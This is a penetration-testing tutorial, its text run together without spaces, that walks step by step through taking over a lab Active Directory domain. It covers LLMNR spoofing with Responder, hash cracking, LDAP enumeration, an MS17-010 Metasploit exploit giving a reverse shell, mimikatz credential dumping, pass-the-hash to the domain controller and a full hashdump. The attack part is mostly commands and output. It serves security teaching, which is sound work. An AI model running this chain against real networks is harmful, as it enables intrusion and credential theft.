sharepointwindowsserver2012

AuditingMicrosoftDomainEnvironmentContentsAbouttheAuthor.
2AboutTheMicrosoftDomainEnvironments:3AboutAuditing:4GainingFirstUser:5EnumeratingADUsersandGroupsWithGainedUser:8CheckingCommonVulnerabilities:12GainingFirstShell:13MigratingIntoAProcess:15PassTheHash:17DumpEverythingFromDomainController:18AuditingMicrosoftDomainEnvironment1AuditingMicrosoftDomainEnvironmentAbouttheAuthorEnginDemirbilek,ComputerEngineeringStudentPenetrationTesterinTurkeyatSiberAsistCyberSecurityConsultancy.
Blog:https://engindemirbilek.
github.
ioFeelfreetoaskmeanythingviaTwitter:@hyal0idI'vebeenwritingthisarticlejusttospendsometimesoitwon'tbeverydetaileddocument.
AuditingMicrosoftDomainEnvironment2AuditingMicrosoftDomainEnvironmentAboutTheMicrosoftDomainEnvironments:WhattoexpectaboutDomainEnvironmentsis:MotherServers:ServersthatrunsActiveDirectoryservicesakaDomainControllers,ChildServers:MicrosoftServersfordealwithspesificneeds(IISServer,MSSQLServeretc.
),ClientMachines:Forusageofclients(Win7,Win10etc),DomainAdminGroupUsers:UserswithhighestlevelprivilegeinDomainforestwhichcancontrollallcomputersindomainforest,OtherGroupsandUsers:UserscreatedbyDomainAdminusersforspesificprivileges.
**AlocaluserofClientMachineorChildserverisnotanADuser,butbyusingthatuseranADusercanbegained.
**ADomainControllerauthenticatesandauthorizesallusersandcomputersinaWindowsDomainForestanditcanenforcesecuritypoliciesforallcomputersandcanalsoinstallorupdatesoftware.
Justlikeasitsounds,everylocaladministratorusersofDomainControllerisbasiclyDomainAdmin.
Byusingtheseusers,alljobsdescribedabovecanbedoneviaanycomputerofDomainForest(withoutaccessingDCremotely).
Schema&MoreDetail:https://docs.
microsoft.
com/en-us/windows-server/identity/ad-ds/plan/using-the-organizational-domain-forest-modelAuditingMicrosoftDomainEnvironment3AuditingMicrosoftDomainEnvironmentAboutAuditing:OurgoldenmissioniscapturingDomainAdminUserduetogaincompletecontrolinallDomaincomputers.
But,insomescenariosuserswithfewerlevelprivilegescanleadtohugeinformationleaks.
Therefore,inthewayofcapturingaDomainAdminuserwedotrygainingasmuchasuserwecan.
Ininternalpenetrationtests,companiesusuallyprovidestrictlylowprivilegedactivedirectoryuserstopenetrationtestersandalsosometimes,wedogainafewusersbyexploitingvulnerabilities,sniffing&spoofingattacks,socialengineeringattacksandpasswordattacksetc.
Byusingthoseuserswecapturecompromisewholedomainforest.
Inthisarticle,IwillshowfewwaysI'vebeenusingPenetrationagainstMicrosoftDomainEnvrioments.
AuditingMicrosoftDomainEnvironment4AuditingMicrosoftDomainEnvironmentGainingFirstUser:Usually,ifi'mnotinaisolatedLANnetworkidotryLLMNR&NBNTSspoofingattacksduetogainanaccount.
Todoso,thereisagreattoolexistscalledResponder.
Ifyouarenewtothistopicshereisquick101:LLMNR:LinkLocalMulticastNameResolution(LLMNR)isaprotocoldefinedinRFC4795thatallowsbothIPv6andIPv4hoststoperformnameresolutionforthenamesofneighboringcomputerswithoutrequiringaDNSserverorDNSclientconfiguration.
NBT-NSisasimilarprotocoltoLLMNRthatservesthesamepurpose.
ThemaindifferencebetweenthetwoisNBT-NSworksoverIPv4onlyLLMNR&NBT-NSSpoofing:WheneverausertrytoreachanunexistedsharepointorcomputerwhichcannotbefindbyDNSqueries,useraskswholenetworkto"Anyoneknowswhereisthis\\sharepoint"byusingLLMNRqueries.
Prettymuchasitsounds,ifanattackersays"Yeahitsrighthere"attackercancaptureusersNtlm/Ntlmv2hashesassoonasuser(victim)trytoconnectattacker'smachine.
https://en.
wikipedia.
org/wiki/Link-Local_Multicast_Name_ResolutionAuditingMicrosoftDomainEnvironment5AuditingMicrosoftDomainEnvironmentSettingUpSpoofingEnvironment:Aswementionedbefore,thereisagreattoolexistforperformingthisjob.
IndefaultKaliLinuxsetup,youreachyourresponderbytypingResponderonyourterminal.
ItusesSMBServertocaptureNtlmhashessostopyoursmbserviceifitsrunning(servicesmbdstop).
root@kali:~#/usr/share/responder/Responder.
py-Ieth0-wrf__|__|NBT-NS,LLMNR&MDNSResponder2.
3.
3.
9Author:LaurentGaffie(laurent.
gaffie@gmail.
com)TokillthisscripthitCRTL-C[+]Poisoners:LLMNR[ON]NBT-NS[ON]DNS/MDNS[ON][+]Servers:HTTPserver[ON]HTTPSserver[ON]WPADproxy[ON]Authproxy[OFF]SMBserver[ON]Kerberosserver[ON]SQLserver[ON]FTPserver[ON]IMAPserver[ON]POP3server[ON]SMTPserver[ON]DNSserver[ON]https://github.
com/SpiderLabs/ResponderAuditingMicrosoftDomainEnvironment6AuditingMicrosoftDomainEnvironmentAftersettingupResponder,wheneverausertrytoreachanunexistedsharepoint:[*][NBT-NS]Poisonedanswersentto10.
0.
0.
6fornameTYPOSHARE(service:FileServer)[SMBv2]NTLMv2-SSPClient:10.
0.
0.
6[SMBv2]NTLMv2-SSPUsername:LAB\Hyaloid[SMBv2]NTLMv2-SSPHash:Hyaloid::LAB:c3b7e6d03aa1156d:1A448B8D1980D5340FB2DCBED2DBE2E6:0101000000000000C0653150DE09D20185B1280D074FA54E000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D20106000400020000000800300030000000000000000000000000200000741131348AABA897DC58E88D7CEFEF3374D1A422C4BC2A2A34D085E14BD2A0F00A0010000000000000000000000000000000000009001C0063006900660073002F005400790070006F0053006800610072006500000000000000000000000000WegethisNTLMv2hash.
CrackingNTLMv2Hash:root@kali:~#johnhash.
txtCreateddirectory:/root/.
johnUsingdefaultinputencoding:UTF-8Rules/masksusingISO-8859-1Loaded1passwordhash(netntlmv2,NTLMv2C/R[MD4HMAC-MD532/64])Press'q'orCtrl-Ctoabort,almostanyotherkeyforstatusPassword5(Hyaloid)1g0:00:00:00DONE2/3(2018-12-1716:19)3.
125g/s323678p/s323678c/s323678C/sPassword5Usethe"--show"optiontodisplayallofthecrackedpasswordsreliablySessioncompletedAuditingMicrosoftDomainEnvironment7AuditingMicrosoftDomainEnvironmentEnumeratingADUsersandGroupsWithGainedUser:Wecapturedausersowhat'snextAftercapturingauserfirstthingweneedtodoischeckingitsprivileges,inthisarticlewewillbepretendingliketheuserwecapturedhasverylowprivilege.
Letssaythatwedidn'tgofurther(privescetc.
)withthisprivileges.
EvenifwecantelevateourprivilegeswiththeuserwecapturedwestillcandoenumerateActiveDirectoryusers,computers,groupsetc.
byusingldapqueriesforfurtherinvestigation.
TodosoImusingascriptfromgithubcalledwindapsearchwhichcanperformmanyldapjobsveryfast.
EnumeratingADUserswithLDAPqueriesviawindapsearch:root@kali:/opt/windapsearch#pythonwindapsearch.
py--domainLAB.
COM--dc-ip10.
0.
0.
1-uLAB\\hyaloid-pPassword5-U[+]UsingDomainControllerat:10.
0.
0.
1[+]GettingdefaultNamingContextfromRootDSE[+]Found:DC=LAB,DC=COM[+]Attemptingbind[+].
.
.
success!
Bindedas:[+]u:LAB\Hyaloid[+]EnumeratingallADusers[+]Found7users:cn:Administratorcn:Guestcn:krbtgtcn:pentestcn:DAcn:Hyaloidcn:Siberasisthttps://github.
com/ropnop/windapsearchAD:ActiveDirectoryAuditingMicrosoftDomainEnvironment8AuditingMicrosoftDomainEnvironmentWhatHappenedinBackground:https://github.
com/wireshark/wiresharkAuditingMicrosoftDomainEnvironment9AuditingMicrosoftDomainEnvironmentEnumeratingDomainAdminswithLDAPqueriesviawindapsearch:root@kali:/opt/windapsearch#pythonwindapsearch.
py--domainLAB.
COM--dc-ip10.
0.
0.
1-uLAB\\hyaloid-pPassword5--da//*CodeOmitted*//[+].
.
.
success!
Bindedas:[+]u:LAB\Hyaloid[+]AttemptingtoenumerateallDomainAdmins[+]UsingDN:CN=DomainAdmins,CN=Users.
CN=DomainAdmins,CN=Users,DC=LAB,DC=COM[+]Found2DomainAdmins:cn:Administratorcn:DAEnumeratingDomainAdminswithLDAPqueriesviawindapsearch:root@kali:/opt/windapsearch#pythonwindapsearch.
py--domainLAB.
COM--dc-ip10.
0.
0.
1-uLAB\\hyaloid-pPassword5-C//*CodeOmitted*//[+]Found:DC=LAB,DC=COM[+]Attemptingbind[+].
.
.
success!
Bindedas:[+]u:LAB\Hyaloid[+]EnumeratingallADcomputers[+]Found3computers:cn,IP,dNSHostName,operatingSystem,operatingSystemVersion,operatingSystemServicePackHACKBOX,10.
0.
0.
6,HACKBOX.
LAB.
COM,Windows7Ultimate,6.
1(7601),ServicePack1SQLSERV,10.
0.
0.
2,SQLSERV.
LAB.
COM,WindowsServer2012R2StandardEvaluation,6.
3(9600),DCAD,10.
0.
0.
1,DCAD.
LAB.
COM,WindowsServer2012R2StandardEvaluation,6.
3(9600),AuditingMicrosoftDomainEnvironment10AuditingMicrosoftDomainEnvironmentWhatwegainedwithLDAPqueriesviawindapsearch:Users:ComputersAdministrator//DomainAdmin10.
0.
0.
6,IT.
LAB.
COMWindows7UltimateGuest10.
0.
0.
2,SQLSERV.
LAB.
COMWindowsServer2012R2Standardkrbtgt10.
0.
0.
1,DCAD.
LAB.
COMWindowsServer2012R2StandardpentestDA//DomainAdminHyaloidSiberasistAuditingMicrosoftDomainEnvironment11AuditingMicrosoftDomainEnvironmentCheckingCommonVulnerabilities:Asweseefromabove,wehaveanindows7clientandalsoanSQLserverexistsondomainforest.
Letscheckifthereisms17_010vulnerabilityexistsonthosesystemsandalsowemustconsidertocheckifsauserofmssqlserviceissufferingfrombasicpasswordusage.
Checkingms17_010vulnerability:msfauxiliary(scanner/smb/smb_ms17_010)>setSMBUSERHyaloidSMBUSER=>Hyaloidmsfauxiliary(scanner/smb/smb_ms17_010)>setSMBPASSPassword5SMBPASS=>Password5msfauxiliary(scanner/smb/smb_ms17_010)>setSMBDOMAINLABSMBDOMAIN=>LABmsfauxiliary(scanner/smb/smb_ms17_010)>setRHOSTS10.
0.
0.
1,2,6RHOSTS=>10.
0.
0.
1,2,6msfauxiliary(scanner/smb/smb_ms17_010)>run[-]10.
0.
0.
1:445-HostdoesNOTappearvulnerable.
[*]Scanned1of3hosts(33%complete)[+]10.
0.
0.
2:445-HostislikelyVULNERABLEtoMS17-010!
-WindowsServer2012R2StandardEvaluation9600x64(64-bit)[*]Scanned2of3hosts(66%complete)[-]10.
0.
0.
6:445-HostdoesNOTappearvulnerable.
[*]Scanned3of3hosts(100%complete)AuditingMicrosoftDomainEnvironment12AuditingMicrosoftDomainEnvironmentGainingFirstShell:Exploitingms17_010vulnerability:msfexploit(windows/smb/ms17_010_psexec)>setSMBUSERHyaloidSMBUSER=>Hyaloidmsfexploit(windows/smb/ms17_010_psexec)>setSMBPASSPassword5SMBPASS=>Password5msfexploit(windows/smb/ms17_010_psexec)>setSMBDOMAINLABSMBDOMAIN=>LABmsfexploit(windows/smb/ms17_010_psexec)>setRHOST10.
0.
0.
2RHOST=>10.
0.
0.
2msfexploit(windows/smb/ms17_010_psexec)>run[*]StartedreverseTCPhandleron10.
0.
0.
5:4444[*]10.
0.
0.
2:445-TargetOS:WindowsServer2012R2StandardEvaluation9600[*]10.
0.
0.
2:445-Builtawrite-what-whereprimitive.
.
.
[+]10.
0.
0.
2:445-Overwritecomplete.
.
.
SYSTEMsessionobtained!
[*]10.
0.
0.
2:445-SelectingPowerShelltarget[*]10.
0.
0.
2:445-Executingthepayload.
.
.
[+]10.
0.
0.
2:445-Servicestarttimedout,OKifrunningacommandornon-serviceexecutable.
.
.
[*]Sendingstage(179779bytes)to10.
0.
0.
2meterpreter>Aswesuccessfullyexploitedthems17_010vulnerabilitywegainedanx86meterpretershellwithSYSTEMprivileges.
Duetousetoolslikemimikatzoursessionarchitecturemustbethesame.
CheckingSystemArchitecture:meterpreter>sysinfoComputer:SQLSERVOS:Windows2012R2(Build9600).
Architecture:x64SystemLanguage:en_USDomain:LABLoggedOnUsers:9Meterpreter:x86/windowsAsweseefromresultofsysinfocommand,systemarchitectureisx64butourmeterpreterisx86.
AuditingMicrosoftDomainEnvironment13AuditingMicrosoftDomainEnvironmentCheckingBackgroundProcceses:meterpreter>psProcessListPIDPPIDNameArchSessionUserPath00[SystemProcess]40Systemx640/*CodeOmitted*/464380services.
exex640472380lsass.
exex640NTAUTHORITY\SYSTEMC:\Windows\System32\lsass.
exe528464svchost.
exex640NTAUTHORITY\SYSTEMC:\Windows\System32\svchost.
exe556464svchost.
exex640NTAUTHORITY\NETWORKSERVICEC:\Windows\System32\svchost.
exe6282484LogonUI.
exex642NTAUTHORITY\SYSTEMC:\Windows\System32\LogonUI.
exe668464VBoxService.
exex640NTAUTHORITY\SYSTEMC:\Windows\System32\/*CodeOmitted*/AuditingMicrosoftDomainEnvironment14AuditingMicrosoftDomainEnvironmentMigratingIntoAProcess:ThingstoConsiderbeforeMigration:1.
Proccesthatwewillmigrateshouldbeatsameprivilegeswithourcurrentprivileges(NTAUTHORITY)2.
Proccessthatwewillmigrateismustbestabiloratleastevenifwemesssomethingitmustbenotcausesystemrestartetc.
Duedomeetthisrequirements,VBOXService.
exeislookslikethebestoptionwehave.
meterpreter>migrate668[*]Migratingfrom3168to668.
.
.
[*]Migrationcompletedsuccessfully.
meterpreter>sysinfoComputer:WIN-G9T7SDV2G4LOS:Windows2012R2(Build9600).
Architecture:x64SystemLanguage:en_USDomain:LABLoggedOnUsers:9Meterpreter:x64/windowsWhat'sNextTobehonest,wedonotneedtogethashesofanyusertogaindomainadminrightfromthispoint.
Wecancheckifthereisanproccessworkingwithdomainadminusersprivileges(thatwefoundearlierwithwindapsearch)andmigratingintothatprocesscouldgiveusdaprivilegesbutduetoshowafewmoretricksletsusemimikatztodumploggedusershashes.
https://github.
com/gentilkiwi/mimikatzAuditingMicrosoftDomainEnvironment15AuditingMicrosoftDomainEnvironmentLoadingMimikatz:meterpreter>loadkiwiLoadingextensionkiwi.
.
.
.
#####.
mimikatz2.
1.
120180925(x64/windows)ALaVie,AL'Amour"BenjaminDELPY`gentilkiwi`(benjamin@gentilkiwi.
com)http://blog.
gentilkiwi.
com/mimikatz'##v##'VincentLETOUX(vincent.
letoux@gmail.
com)http://pingcastle.
com/http://mysmartlogon.
com***/Success.
Gettingpasswordhasheswithmimikatz:meterpreter>creds_all[+]RunningasSYSTEM[*]RetrievingallcredentialsmsvcredentialsUsernameDomainNTLMSHA1DALAB64f12cddaa88057e06a81b54e73b949bcba4e545b7ec918129725154b29f055e4cd5aea8HyaloidLABa738f92b3c08b424ec2d99589a9cce600509c9efe1b0d6ea63697e335434302096859164WIN-G9T7SDV2G4L$LAB6eaab25fb08a7382f7cc1a54d97e80de8c02e734ed99ebdfaec174ffed707cafc4844dfa.
Bingo!
RememberedtheDAuserfromwindapsearchresultsItisandomainadmingroupuser.
AuditingMicrosoftDomainEnvironment16AuditingMicrosoftDomainEnvironmentPassTheHash:Passingthehashisgamechangertrickthatweuseatnearlyeveryinternalaudit.
Ifyouarenewtothistopichereisquick101fromwikipedia:passthehashisahackingtechniquethatallowsanattackertoauthenticatetoaremoteserverorservicebyusingtheunderlyingNTLMorLanManhashofauser'spassword,insteadofrequiringtheassociatedplaintextpasswordasisnormallythecase.
PassTheHashwithPsexec:Duetoperformthisjobs,onlyweneedisNTLMhashofaprivilegeduser.
Thatsexactlywhatwegainedbeforewithmimikatz.
msfexploit(windows/smb/psexec)>setSMBUSERDASMBUSER=>DAmsfexploit(windows/smb/psexec)>setSMBPASS00000000000000000000000000000000:64f12cddaa88057e06a81b54e73b949b//LM:NTLMSMBPASS=>64f12cddaa88057e06a81b54e73b949b:64f12cddaa88057e06a81b54e73b949bmsfexploit(windows/smb/psexec)>setSMBDOMAINLABSMBDOMAIN=>LABmsfexploit(windows/smb/psexec)>setRHOST10.
0.
0.
1//DomainControllerRHOST=>10.
0.
0.
1msfexploit(windows/smb/psexec)>run[*]StartedreverseTCPhandleron10.
0.
0.
5:4444[*]10.
0.
0.
1:445-Connectingtotheserver.
.
.
[*]10.
0.
0.
1:445-Authenticatingto10.
0.
0.
1:445|LABasuser'DA'.
.
.
[*]10.
0.
0.
1:445-SelectingPowerShelltarget[*]10.
0.
0.
1:445-Executingthepayload.
.
.
[+]10.
0.
0.
1:445-Servicestarttimedout,OKifrunningacommandornon-serviceexecutable.
.
.
[*]Sendingstage(179779bytes)to10.
0.
0.
1FurtherReadforPassTheHash:https://www.
sans.
org/reading-room/whitepapers/testing/pass-the-hash-attacks-tools-mitigation_33283AuditingMicrosoftDomainEnvironment17AuditingMicrosoftDomainEnvironmentDumpEverythingFromDomainController:SincewegotanprivilegedsessionfromDomainControllerwecoulddumpeverythingfromit!
meterpreter>loadkiwiLoadingextensionkiwi.
.
.
c.
#####.
mimikatz2.
1.
120180925(x64/windows)ALaVie,AL'Amour"BenjaminDELPY`gentilkiwi`(benjamin@gentilkiwi.
com)http://blog.
gentilkiwi.
com/mimikatz'##v##'VincentLETOUX(vincent.
letoux@gmail.
com)'#####'>http://pingcastle.
com/http://mysmartlogon.
com***/Success.
meterpreter>getuidServerusername:LAB\DAmeterpreter>getsystem.
.
.
gotsystemviatechnique1(NamedPipeImpersonation(InMemory/Admin)).
meterpreter>hashdumpAdministrator:500:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::krbtgt:502:aad3b435b51404eeaad3b435b51404ee:eb00cddf33274125bd6081d301c78cbc:::pentest:1105:aad3b435b51404eeaad3b435b51404ee:c4b0e1b10c7ce2c4723b4e2407ef81a2:::DA:1106:aad3b435b51404eeaad3b435b51404ee:7247e8d4387e76996ff3f18a34316fdd:::Hyaloid:1107:aad3b435b51404eeaad3b435b51404ee:a738f92b3c08b424ec2d99589a9cce60:::Siberasist:1108:aad3b435b51404eeaad3b435b51404ee:499108ff7eeea55a4765f1c57665f840:::AuditingMicrosoftDomainEnvironment18AuditingMicrosoftDomainEnvironmentConclusion:Thisisnottheonlyscenariothatwemeetoninternalaudits,therearemanymorescenarioscouldbeperformedaccordingtovulnerabilities,attackvectors,networktopology,operationsystemsetc.
butitisverycommonscenariothatI'vemetinafewpentestsbefore.
Thanksforreading.
AuditingMicrosoftDomainEnvironment19